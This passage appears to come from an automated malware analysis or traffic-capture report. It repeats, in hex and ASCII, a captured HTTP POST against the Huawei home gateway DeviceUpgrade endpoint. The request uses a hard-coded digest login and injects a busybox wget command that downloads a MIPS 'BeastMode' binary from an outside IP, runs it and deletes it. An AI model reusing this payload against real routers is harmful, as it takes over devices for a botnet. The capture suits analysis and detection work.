s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 